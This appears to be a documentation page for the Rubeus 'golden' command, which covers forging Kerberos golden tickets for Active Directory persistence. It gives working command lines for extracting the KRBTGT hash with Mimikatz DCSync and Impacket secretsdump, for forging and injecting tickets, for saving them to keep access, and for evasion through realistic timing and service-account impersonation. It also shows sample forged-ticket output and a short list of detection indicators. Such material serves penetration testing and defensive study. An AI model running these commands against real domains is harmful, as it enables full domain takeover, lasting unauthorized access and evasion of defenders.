golden

Golden Ticket attacks represent the pinnacle of Active Directory persistence, providing domain-wide access that persists even after password changes and system reboots.

Overview

Golden tickets are forged Ticket Granting Tickets (TGTs) created using the KRBTGT account’s password hash. These tickets provide persistent, high-privilege access to Active Directory environments by appearing completely legitimate to domain controllers.

Domain Persistence

Maintain access even after credential rotations

Full Privileges

Domain Admin level access across the environment

Stealth Operations

Tickets appear legitimate to security controls

Attack Prerequisites

Obtain KRBTGT Hash

Extract the KRBTGT account password hash through DCSync or other methods

Domain Information

Gather domain SID, domain name, and target user information

Ticket Creation

Forge the golden ticket with desired privileges and validity

Ticket Injection

Apply the forged ticket to gain domain-wide access

Syntax Variations

Manual Mode
LDAP Mode
Output & Injection

# Manual specification of all parameters
Rubeus.exe golden /user:admin /domain:corp.local /sid:S-1-5-21-123456789-987654321-111111111 /rc4:krbtgt_hash

Required Parameters

user

string

required

Username for the forged ticket

Show Username Options

Real Users: Use existing domain accounts for stealth
Fake Users: Create non-existent users (still works)
Administrative: Target high-privilege account names
Service Accounts: Impersonate service accounts

KRBTGT Authentication

Hide Hash Types

des

string

DES-CBC-MD5 hash (legacy, not recommended)

rc4

string

RC4-HMAC hash (NTLM format)

aes128

string

AES128-CTS-HMAC-SHA1-96 key

aes256

string

AES256-CTS-HMAC-SHA1-96 key (recommended)

Domain Information

Show Manual Configuration

domain

string

Target domain name (FQDN format)

sid

string

Domain Security Identifier

Show SID Discovery Methods

# PowerShell method
Get-ADDomain | Select-Object DomainSID

# Using whoami
whoami /user

# Using wmic
wmic useraccount where name='Administrator' get sid

netbios

string

NetBIOS domain name (optional)

Show LDAP Automatic Discovery

ldap

boolean

Automatically gather domain information via LDAP

string

Specific domain controller for LDAP queries

Ticket Customization

Show User Identity

number

User ID (RID) for the ticket

displayname

string

Full display name for the user

groups

string

Comma-separated list of group RIDs

Show Common Group RIDs

512: Domain Admins
513: Domain Users
518: Schema Admins
519: Enterprise Admins
520: Group Policy Creator Owners

pgid

number

Primary Group ID (default: 513 - Domain Users)

Show Timing Configuration

authtime

string

Authentication time (default: now)

starttime

string

Ticket start time (default: now)

endtime

string

Ticket expiration time

renewtill

string

Renewable until time (default: 10 years)

Show Advanced Options

flags

string

Ticket flags (default: 0x40e10000)

Show Common Flags

0x40e10000 - Standard forwardable, renewable ticket
0x60a10000 - Include name canonicalize
0x40a50000 - Delegation-capable ticket

uac

string

User Account Control flags

sids

string

Additional SIDs to include

oldpac

boolean

Use legacy PAC format for compatibility

Output Options

Show Ticket Output

outfile

string

Save forged ticket to file (.kirbi format)

ptt

boolean

Pass-the-ticket: inject forged ticket immediately

printcmd

boolean

Print command line for ticket creation

Response Format

Successful Creation
LDAP Discovery
Error Scenarios

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : CORP.LOCAL (CORP)
[*] SID            : S-1-5-21-1234567890-987654321-111111111
[*] UserId         : 500
[*] Groups         : 512,513,518,519,520
[*] ServiceKey     : aes256_key_here
[*] ServiceKeyType : aes256_cts_hmac_sha1
[*] KDCKey         : aes256_key_here
[*] KDCKeyType     : aes256_cts_hmac_sha1
[*] Service        : krbtgt
[*] Target         : CORP.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'admin@CORP.LOCAL'

[*] AuthTime       : 10/25/2024 1:23:45 PM
[*] StartTime      : 10/25/2024 1:23:45 PM
[*] EndTime        : 10/25/2034 1:23:45 PM
[*] RenewTill      : 10/25/2034 1:23:45 PM

[*] base64(ticket.kirbi):
      doIFujCCBbagAwIBBaEDAgEWooIEujCCBLahggS2MIIEsqADAgEFoQwbCkNPUlAuTE9D
      QUyhHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmNvcnAubG9jYWyjggR9MIIEeaADAgESoQMC
      AQKiggRrBIIEZ2P+9l3v9...

PAC Information

object

Details about the Privilege Attribute Certificate

Show PAC Fields

Domain: Target domain and NetBIOS name
SID: Domain Security Identifier
UserId: User RID in the ticket
Groups: Group memberships granted

Encryption Details

object

Cryptographic information about the ticket

Show Encryption Fields

ServiceKey: KRBTGT key used for signing
ServiceKeyType: Encryption algorithm used
KDCKey: Key Distribution Center key

Ticket Timing

object

Validity periods for the forged ticket

Show Time Fields

AuthTime: When authentication occurred
StartTime: When ticket becomes valid
EndTime: When ticket expires
RenewTill: Latest renewal time

Base64 Ticket

string

The forged TGT in base64 format for use or storage

Complete Attack Workflow

Obtain KRBTGT Hash

Extract KRBTGT credentials using DCSync or other methods:

# Using Mimikatz
mimikatz.exe "lsadump::dcsync /user:krbtgt"

# Using Impacket
secretsdump.py domain/user:password@dc01.corp.local

# Using Rubeus with delegation
Rubeus.exe dump /service:krbtgt /nowrap

Domain Information Gathering

Collect required domain information (if not using LDAP mode):

# Get domain SID
Get-ADDomain | Select-Object DomainSID

# Alternative method
whoami /user

Golden Ticket Creation

Create the forged TGT with appropriate parameters:

# LDAP mode (recommended)
Rubeus.exe golden /user:admin /rc4:krbtgt_ntlm_hash /ldap /ptt

# Manual mode
Rubeus.exe golden /user:admin /domain:corp.local /sid:S-1-5-21... /rc4:krbtgt_hash /ptt

Verification and Usage

Verify the ticket was created and test access:

# List current tickets
Rubeus.exe klist

# Test domain controller access
dir \\dc01.corp.local\c$

# Request service tickets
Rubeus.exe asktgs /service:cifs/fileserver.corp.local

Persistence Operations

Use the golden ticket for persistent access:

# Save ticket for later use
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /outfile:golden.kirbi

# Create additional tickets as needed
Rubeus.exe golden /user:serviceaccount /rc4:krbtgt_hash /ldap /groups:513,1001

Advanced Usage Scenarios

Stealth Operations
Cross-Domain Operations
Bulk Operations

Hide Realistic User Simulation

# Create ticket for existing user with normal privileges
Rubeus.exe golden /user:john.doe /rc4:krbtgt_hash /ldap /groups:513 /id:1001

# Gradually escalate with additional tickets
Rubeus.exe golden /user:john.doe /rc4:krbtgt_hash /ldap /groups:513,1001,1002

Show Time-Based Evasion

# Create ticket with realistic timing
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /authtime:"10/25/2024 09:00:00" /endtime:"10/25/2024 17:00:00"

# Short-lived ticket for specific operations
Rubeus.exe golden /user:admin /rc4:krbtgt_hash /ldap /endtime:"10/25/2024 23:59:59"

Show Service Account Impersonation

# Impersonate service accounts
Rubeus.exe golden /user:svc_sql /rc4:krbtgt_hash /ldap /groups:513 /id:1100

# Machine account impersonation
Rubeus.exe golden /user:COMPUTER$ /rc4:krbtgt_hash /ldap /groups:515

OPSEC Considerations

High-Impact Attack: Golden tickets provide complete domain access and can be detected through various monitoring techniques.

Detection Vectors
Evasion Techniques
Defensive Countermeasures

Hide Ticket Analysis

Unusual Ticket Characteristics:

Tickets with 10-year validity periods
Non-existent usernames in tickets
Tickets created outside normal hours
Unusual group memberships or privileges

Behavioral Indicators:

Authentication without prior logon events
Access to resources without service ticket requests
Privileged operations from low-privilege accounts

Show Event Log Monitoring

Windows Event Logs:

Event 4769: Service ticket requests with unusual patterns
Event 4768: TGT requests that don’t correlate with golden ticket usage
Event 4624: Logon events that may not occur with golden tickets
Event 4672: Special privileges assigned without normal authentication

Show Network Monitoring

Kerberos traffic analysis for unusual patterns
TGS requests without corresponding TGT requests
Authentication to services without normal authentication flow
Unusual timing patterns in authentication events

Troubleshooting

Show Common Issues

Hash Format Issues
LDAP Connectivity
Access Issues

Problem: Invalid KRBTGT hash format errorsSolutions:

Verify hash is exactly 32 characters for RC4
Ensure AES keys are proper length (32 chars for AES128, 64 for AES256)
Remove any spaces or line breaks from hash
Verify hash was extracted correctly

# Verify hash format
echo "hash_length: ${#krbtgt_hash}"

# Test with RC4 hash
Rubeus.exe golden /user:test /rc4:32ed87bdb5fdc5e9cba88547376818d4 /domain:corp.local /sid:S-1-5-21...

Integration with Other Attacks

DCSync Integration

Use DCSync to obtain KRBTGT hash for golden ticket creation

Lateral Movement

Use golden tickets to access remote systems and services

Persistence Chains

Combine with other persistence techniques for redundant access

Privilege Escalation

Escalate from limited access to domain administrator privileges

silver

Create service-specific forged tickets

diamond

Create hybrid legitimate/forged tickets

ptt

Inject golden tickets into sessions

describe

Analyze golden ticket structure

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

Overview

Domain Persistence

Full Privileges

Stealth Operations

Attack Prerequisites

Syntax Variations

Required Parameters

KRBTGT Authentication

Domain Information

Ticket Customization

Output Options

Response Format

Complete Attack Workflow

Advanced Usage Scenarios

OPSEC Considerations

Troubleshooting

Integration with Other Attacks

DCSync Integration

Lateral Movement

Persistence Chains

Privilege Escalation

silver

diamond

ptt

describe

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

​Overview

Domain Persistence

Full Privileges

Stealth Operations

​Attack Prerequisites

​Syntax Variations

​Required Parameters

​KRBTGT Authentication

​Domain Information

​Ticket Customization

​Output Options

​Response Format

​Complete Attack Workflow

​Advanced Usage Scenarios

​OPSEC Considerations

​Troubleshooting

​Integration with Other Attacks

DCSync Integration

Lateral Movement

Persistence Chains

Privilege Escalation

​Related Commands

silver

diamond

ptt

describe

Overview

Attack Prerequisites

Syntax Variations

Required Parameters

KRBTGT Authentication

Domain Information

Ticket Customization

Output Options

Response Format

Complete Attack Workflow

Advanced Usage Scenarios

OPSEC Considerations

Troubleshooting

Integration with Other Attacks

Related Commands